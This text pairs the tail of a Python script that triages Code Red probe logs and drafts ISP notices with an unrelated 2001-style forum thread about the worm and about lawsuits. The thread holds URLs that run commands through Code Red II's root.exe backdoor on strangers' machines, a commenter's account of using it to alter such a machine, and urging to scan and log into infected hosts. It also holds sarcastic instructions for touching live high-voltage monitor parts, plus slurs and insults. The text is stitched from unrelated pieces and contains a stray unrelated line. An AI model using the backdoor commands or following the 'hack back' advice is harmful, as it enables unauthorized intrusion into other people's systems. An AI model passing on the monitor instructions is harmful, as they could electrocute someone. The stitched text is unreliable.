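        body = (f"From: {sender}\nTo: {recipient}\n"
                f"Subject: Code Red probes from {host}\n\n"
                f"{host} sent {count} Code Red-style request(s) to our web server "
                f"and is probably infected. Please patch and rebuild it.\n")
        messages.append((recipient, body))
    return messages


# Constructed address-to-domain table standing in for DNS (assumption, not real data).
FAKE_RESOLVER = {"198.51.100.10": "isp-a.example", "203.0.113.44": "isp-b.example"}.get

if __name__ == "__main__":
    summary = triage(SAMPLE_LOG)
    print(f"{summary['total']} probes from {summary['unique_hosts']} hosts")
    for count, host in summary["top"]:
        print(f"{count:6d} {host}")
    for recipient, body in notifications(SAMPLE_LOG, FAKE_RESOLVER):
        print("---", recipient)
        print(body)
```

Counting by source address rather than by request string is what makes the list useful for contacting upstreams, and keeping the DNS step behind an injected function means the parsing and ranking can be checked against a fixed log without touching the network.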
Some stats I ran to see how many times my personal firewall blocked access to my computer on port 80 on a daily basis. Just your typical computer with an always on connection. Very many of them originating from 24.*.*.* Oh, and there currently isn't (and won't be because who cares) a script for generating these. And I grabbed a username that's appropriate. I hope somebody cares. Wait, no I don't.
Despite the rising cost of living, it remains a popular activity.
Last week: 92
Last 32 hours: 196 (175 unique addresses)
Looks like it's concrete bunker time soon... )-:
Got time? Spend some of it coding or testing
Microsoft's products spew pollution into the information space like a burning mountain of tires.
For sure! Take a look at my webserver (which pioneers the great new feature of a "Log File Chat Room" (tm 2001 Lawrence Wade)).
This new variant seems to have been especially active, it's eating up a lot of my bandwidth. Last time, my IP address wasn't getting scanned as much as many other people I spoke with; I'm wondering if this one includes a better random number seed. I'm also seeing IIS victims from my ISP.
Also, I wonder if a disclaimer stating that infected IIS servers are not allowed to visit my website would be sufficient to work towards suing Microsoft for their ongoing gross negligence and complicity causing material and financial damage.
Fire and Meat. Yummy.
"Is there no way that companies could sue Microsoft due to loss of business / bandwidth charges, caused indirectly by poorly written software?"
"Nope, look at your EULA" The statement that the "EULA still applies" is incorrect. The EULA is not binding on anyone who is not a party to the contract (i.e., the End User License Agreement). There is no privity of contract.
Whether Microsoft could be sued under these circumstances raises an interesting, and to my knowledge unprecedented legal issue. It may be possible. One could assert a civil action for negligence. The plaintiffs would argue that but for Microsoft's negligence, they would not have incurred the bandwidth costs.
Microsoft would, undoubtedly among other things, deny that it was negligent, and raise issues regarding proximate / legal cause, as well as intervening cause.
Let me give you a *possibly* analogous example from the world of torts. You leave your keys in your car, and the doors unlocked. Perpetrator steals your car, is chased by the police, and runs over and kills a child. Perpetrator has no assets. The child's parents sue you for negligence for the wrongful death of their child. Result?
If you say you are not liable, then add these facts. The evidence shows that: (a) you left your car in a horrible neighborhood where cars are routinely stolen; and (b) you knew this fact. Result?
If you still say you are not liable, then add the fact that your car had itself been previously stolen on four occasions within the past year. Result?
I wouldn't be surprised if a well-funded law firm filed a class action lawsuit against MS for negligence and other causes of action. It would be a reach, and very expensive, but the publicity and potential pay off might make it worth it.
Only Women Bleed (Sex, Sharia remix)
Jeez people, never look a gift horse in the mouth!
http://l-usersIP/scripts/root.exe?/c+dir+c:\
start searching from there...
* > 100000
* mDmcOaA5pDmoOaw5sDnAOeA56DnsOfA59Dn4Ofw5ADoEOgg6H
Okay. Forgive me if the syntax is off, I've never had to play with procmail filters. But it strikes me that this one would be significantly more useful:
* X-mailer=Outlook
:)
Fire and Meat. Yummy.
You really don't have many permissions on this for something called 'root.exe'. I tried to make a dir on the users desktop folder called "you have the code red II virus see incidents dot org for help" but got permission denied. So I left a folder of that name in the root folder, and renamed 'root.exe' to 'root.123' so no-one else can dick with it. My good deed for today...
"that's not encryption - it's a new perl script that I'm working on..." - from some Matrix parody
Rules for successfully surviving a trilogy:
Step 1: Don't run Microsoft servers (duh...)
Step 2: ?
Step 3: Repent! (if you ever ran an MS server)
http://xxx.xxx.xxx.xxx/scripts/root.exe?/C+dir%20a :\
Like I said, I'm tired of bothering with this without any windows machine to work on. So, someone else can take it up and put it to use (the funny name is so it doesn't get executed as cgi or mod_perl): <link>cr_response.perlscript</link>. You can run it as cgi or command line. I'm just setting the apache conf to deny access and skip logging from outside my lan. Enjoy.
I wonder if you could claim something like self-defense for something like this?
I'm being actively attacked, multiple times, by someone elses hacked machine. That is an "unauthorized intrusion" attempt into my machine. If I go and perform an "unauthorized intrusion" on their machine in order to shut them down so as to protect my own services, why would I get in trouble for that?
Sure, it's not like the guy tried to shoot me and I had to shoot back to protect myself, but it seems like a proportionate response to me.
At least, that's MY way of thinking.
$0.02 (CDN)
The McDonald's coffee case judge was not braindead. Get the facts straight, they have been mentioned even here hundreds of times already. The coffee was hot enough to cause severe burns on contact, and McD knew it was so and they still sold the coffee at such temperature.
You're kidding, right? I think you are, but I'm not sure. Okay. Well, I'll treat my response as if you're serious.
I worked at a McDonalds, aeons ago, when I was in high school. Like, 1991. Probably when you were still in kindergarten.
I worked there for four years. My first year, it was hell, I was minimum wage scum, but McDonalds is like the army: you get out of it exactly what you put into it.
Well, I was nice with everyone, and I always arrived on time, and I always worked hard. And I was quickly awarded Employee of the Month. Less than a week after that, I was asked to come in for a staff meeting. I thought I was in trouble for something. All the managers sat me down very seriously, and asked me if I knew why I was there. They passed me a package and told me to sign for its receipt. I did, then I opened the package. It was a manager's uniform with my name on the little gold tag.
I got to know a lot about McDonalds and its customers in the 3 years that followed. It was, believe it or not, a great job and I made a lot of friends working at McDonalds with whom I'm still in touch.
As a part time ("Swing") manager, I got to help ensure that the restaurant ran smoothly. Ordering supplies, ensuring the staff have everything they need, resolving conflicts, assuring quality control, and dealing with customer complaints.
One of the most common customer complaints was that the coffee was too cold. And yet, as part of my quality control role, I was responsible for ensuring that the temperatures on every cooking appliance were correct when I started my shift. The coffee, at the time, was to be kept at 85C.
Now, of course, since some slovenly white trash got rich because of her own stupidity, I'm sure the customer complaints about cold coffee are even more common. From what I understand, the coffee is to be kept at 73C now.
Of course it's hot. Coffee is supposed to be hot. Next thing is people will start suing over Eskimo Pie migraines they get when they drink their cold Coke too quickly.
GM recently got sued for several billion dollars. It was Christmas Eve in about 1995 when this tragedy occurred. A family was riding along in their 1978 Chevy Malibu (already an old car). They were stopped at a red light, and a drunk driver hit them from behind. The car's gas tank exploded, and while the family were all conscious and relatively unhurt, when they got out, one of the kids had third degree burns to his leg. So they sued GM for faulty fuel tank design.
Now, one thing about this case that terrifies me is that this was a 17-year-old car at the time of the accident. Who knows what nature of wear had been experienced? Rusted out gas tank? For all we know, this car shouldn't have been on the road to begin with.
The other thing that terrifies me is that the jury wasn't allowed to hear how fast the vehicle that rear-ended them was travelling. Remember, they were stopped at a traffic light. They were hit by a drunk driver in a full-size pickup truck travelling at 75MPH. Approximately 120km/h.
Changes things a little, doesn't it? How survivable is that accident?
Rather than suing GM because a 17 year old car blew up when it was rear-ended by a 4,000lb mass travelling at 75MPH, I think I'd be writing a letter to GM to thank them for the fact that despite such a horrific accident, I still had both my kids.
Your remark suggests a tacit support of the excessive litigation against businesses. My wish upon you is that you mortgage your house, open a business, and get sued by someone who gets a paper cut off your first invoice.
Fire and Meat. Yummy.
One of the most common customer complaints was that the coffee was too cold. And yet, as part of my quality control role, I was responsible for ensuring that the temperatures on every cooking appliance were correct when I started my shift. The coffee, at the time, was to be kept at 85C.
I don't care what temperature you set it to when YOU worked at mcdonalds, dumbass. The woman got THIRD DEGREE burns. That is TOO HOT for coffee. Idiot.
Thought you'd like this... AOL has been hit by the Code Red worm.. It's unconfirmed whether it's version 1 or 2, but Warner Brothers in the US and UK networks are down. AHHAHAHAHAHAH AOL SUCKS!
"It's not like your minds are as open as the source you love..." - Me to the majority of Slashdot.
A disproportionate number of the hits on my (Australian) web servers [sources] are from asian countries, leading me to suspect that perhaps the non-English versions of the patch and/or some of the prerequisite Service Packs were released late and/or not as well publicised.
If I was forced to ride shotgun on one of these security sieves, I'd be checking for patches twice daily. And I'd have the sucker behind a non-M$ reverse proxy.
Got time? Spend some of it coding or testing
Not so easy, the right service packs appear to be required first. So your little proggie would first have to determine what was needed, second download and install it all, then finally clean off the rootshell.
Got time? Spend some of it coding or testing
I decided to take a look at some of the systems that I've gotten Code Red II probes from. It's amazing how unsecured these things are. Scan their ports. Log in to their ftp servers. Don't worry. You don't need a password. Note that you can read and write to their cgi-bin directory. Please don't make them crash. Look but don't touch. Others will want to have a look at them too.
Checking some of the IP addresses in my firewall log, I'm getting the default web pages for Apache...even on Red Hat...is there some way that someone can change the pages on an infected machine? For example, check out http://209.5.115.231/ or http://209.236.45.125/
Confused@home
Do this don't do that Can't you redesign.
Don't put a lobster on a plate!
He'll use his magnet to escape!
He'll jump right up and claw your ear,
And then he'll bite your EYE!
I don't care what temperature you set it to when YOU worked at mcdonalds, dumbass. The woman got THIRD DEGREE burns. That is TOO HOT for coffee. Idiot.
Yeah. So, she's apparently not intelligent enough to be trusted with coffee, or tea, or hot chocolate... I'd also draw the line at giving her a driver's license. In fact, I'd legislate that people like her should have to wear helmets everywhere they go.
I can't drink coffee at 73C, let alone 85C. But I also know that at 85C, people complain that the coffee is too cold. Those are the edicts from McDonalds, not the temperature at which I independently chose to set the Bunn's thermostat.
So? I carefully put my coffee aside and let it cool.
As for the third degree burns, you can get third degree burns from something that is a mere 50C. Note that is the temperature to which most hot water heaters are set. Are you therefore a proponent of a law requiring everyone to turn down their hot water heaters to 37C so that they can't burn people? Heck, there are lots of other things that can burn you. If you're stupid, take the back cover off your monitor. Right at the back of the picture tube's neck, you'll find that there is an area of glass heated by radiant heat leaving the cathodes. Rest your finger there and see how many yucks you have. Let's ban monitors because they can hurt people. Let's ban stoves because a child could turn on a burner and scorch himself. Let's ban cars because the radiator gets warm. Of course, we can't let people have bicycles, either, there are many ways to get hurt on *those*, least of which being the elevated temperature of the brake pads after stopping.
You, sir, like the bovine hausfrau who was too stupid to ensure that her coffee didn't spill on her lap, are the idiot. If I were President, I'd find you and your peers a nice little padded cell somewhere so that you may avoid any sort of risk or personal responsibility for your activities.
And, PS. While you're in the monitor, look for the big coils of wire around the funnel of the tube. Okay. Find the wires that go to the area of the big plastic block and the big red wire that goes to the suction cup on the back of the tube. Now, this is very important... turn on the monitor and lick your hands. Touch the sheetmetal shielding inside the monitor with your left hand. With your right hand, simultaneously touch the solder connection where the horizontal deflection voltage leaves the PC board (near the big plastic box, remember). Feeling warm yet? If your skin isn't on fire within a few seconds, you didn't follow the instructions right.
Fire and Meat. Yummy.
If your coffee is too hot, add an ice cube or let it cool off. If your coffee is too cold, you curse McDonalds for making cold coffee. Coffee is supposed to be hot. Most domestic coffee brewers percolate boiling water up; the steam condenses and drips into the filter basket, and enters the pot at a temperature very close to boiling. No one sues Mr. Coffee or Black and Decker.
Anyhow, as you simultaneously manage to frustrate and bore me, this thread is now extinct. Maybe once you can shave daily and manage to become remotely cosmopolitan, your perspective will adjust somewhat.
Fire and Meat. Yummy.